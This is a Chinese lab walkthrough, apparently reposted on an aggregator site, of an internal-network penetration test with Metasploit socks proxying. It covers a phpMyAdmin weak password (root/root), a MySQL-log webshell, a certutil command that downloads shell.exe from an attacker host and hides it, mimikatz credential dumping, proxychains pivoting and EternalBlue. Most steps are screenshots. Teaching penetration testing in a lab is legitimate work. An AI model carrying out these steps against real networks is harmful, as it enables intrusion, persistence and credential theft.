内网渗透测试 MSF搭建socks代理

这篇具有很好参考价值的文章主要介绍了内网渗透测试 MSF搭建socks代理。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境搭建:

内网渗透测试 MSF搭建socks代理

最终效果为如此,web服务器可以ping通外网和内网两台服务器

 内网渗透测试 MSF搭建socks代理

 内网渗透测试 MSF搭建socks代理

外网打点

信息收集

内网渗透测试 MSF搭建socks代理

发现端口:

80 http

3306 mysql

敏感目录:

内网渗透测试 MSF搭建socks代理

/phpMyadmin

数据库弱口令 root root

通过日志功能getshell

现在咱们查询一下日志功能是否开启,默认是关闭的。

show variables like "general_log%";

开启日志功能

命令行 set globalgeneral_log='on';

图形化:

内网渗透测试 MSF搭建socks代理

修改日志保存路径:

内网渗透测试 MSF搭建socks代理

输入一句话木马并执行,使日志保存一句话木马。

内网渗透测试 MSF搭建socks代理

拿到shell权限。

 内网渗透测试 MSF搭建socks代理

稳定权限

​
certutil -urlcache -split -f http://192.168.x.xxx/shell.exe

​

将文件设置为隐藏文件

 attrib shell.exe +s +h

内网信息探测:

msf的马子让cs去接受。

内网渗透测试 MSF搭建socks代理

 可以看到cs这里已经成功上线

内网渗透测试 MSF搭建socks代理

 先提权:

内网渗透测试 MSF搭建socks代理

可以看到已经多了一个system用户。

内网渗透

mimikatz工具抓取本机用户名密码: 

内网渗透测试 MSF搭建socks代理

查看域下其他主机 

内网渗透测试 MSF搭建socks代理

回到msf

route查看路由表

内网渗透测试 MSF搭建socks代理

结合cs获得的内网主机信息可以得到 内网的网段为 192.168.52.0/24

socks代理

 加入路由表 (1是session值)route add 192.168.52.0 255.255.255.0 1

输出路由表信息 route print

 run autoroute -s 10.10.10.0/24
内网渗透测试 MSF搭建socks代理

 

(加入到路由表是搭建内网转发socks代理的前提之一)

内网渗透测试 MSF搭建socks代理

使用代理模块

 并设置参数

内网渗透测试 MSF搭建socks代理

jobs一下查看到存在 jobs值便说明代理设置成功。

 配置etc/proxychains4.conf

内网渗透测试 MSF搭建socks代理

Proxychains +命令

内网渗透测试 MSF搭建socks代理

 

成功将kali的流量转发的内网中。 

关一下防火墙 

内网渗透测试 MSF搭建socks代理

我这里直接就关了,如果没有成功可以提一下权到system 

探测到内网主机138主机开放445端口

使用msf的永恒之蓝模块

内网渗透测试 MSF搭建socks代理

 内网渗透测试 MSF搭建socks代理

余下的一台内网主机,如法炮制。

至此整个目标域网络拿下。 文章来源地址https://www.toymoban.com/news/detail-404453.html

到了这里,关于内网渗透测试 MSF搭建socks代理的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网穿透渗透小白初级基础(二)之sock5 代理

    了解sock5 代理应该是很多人踏入内网穿透的第一步,这对以后的内网穿透之路有很大的影响,也是很多人入门的必经之路,这次我们就来讲讲sock5 代理是什么,是怎么操作的,再内网穿透中有什么作用。 首先,我们要搭配好这样一个环境,为了环境更加真实,这次我们需要通

    2024年02月07日
    浏览(44)
  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(46)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(45)
  • 论后渗透MSF之 | 添加路由和代理

    内网中添加路由主要是 充当跳板 功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上 添加一条去往内网的路由 ,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话 通过msf添加路由功能,

    2024年01月16日
    浏览(43)
  • 内网安全:Socks 代理 || 本地代理 技术.

    Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为10

    2024年02月08日
    浏览(51)
  • 渗透测试神器-msf基础

    Metasploit-framework(用ruby写的)基础: MSF拥有世界上最大的渗透测试攻击数据库 Vulnerability:漏洞统称 expoit:攻击代码或者程序 Payload:完成实际攻击功能的代码 module:组成完整系统的基本构造块,每个模块执行特定任务 运行msf: msf模块介绍: Exploit:msf最核心的模块,里面有针对

    2024年02月05日
    浏览(78)
  • 详尽的msf——meterpreter——渗透测试教程

    本文仅供学习参考使用,切勿用于非法事情!! 众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。 现在发现msf很厉害,可以在它的基础上开发。 msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期

    2023年04月15日
    浏览(44)
  • 70内网安全-域横向内网漫游Socks代理隧道技术(下)

              这节课解决代理的问题, 他是内网里面的穿透技术,隧道主要安全设备和流量监控的拦截问题,我们在做渗透的时候需要回显数据或者一些重要的信息,走的协议不一样,tcp/ip有七层, 在不同层里面有不同的协议,有一些协议会受到防火墙,过滤设备和流量检测

    2024年02月03日
    浏览(44)
  • 渗透测试环境搭建

    1.pikachu官网下载 下载地址:https:// github .com/zhuifengshaonianhanlu/pikachu 2 . phpStudy 下载链接 phpStudy下载(安装)-图文详解(windows)_victor_王泽华的博客-CSDN博客_phpstudy windows 二、pikachu简介 pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 三、pikachu安装 1.先下

    2024年02月16日
    浏览(41)
  • 【安全测试】渗透测试神器BurpSuite环境搭建

    工欲善其事,必先利其器,要想更好的进行安全测试,就需要有一个趁手的工具,BurpSuite就是一个不错的选择,是广大安全测试工程师的必备工具,今天就带着大家把这个工具给装上,开启大家的安全测试之旅吧。 目录 一、BurpSuite简介 二、jdk环境搭建 1、下载jdk 2、安装两个

    2024年02月06日
    浏览(80)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包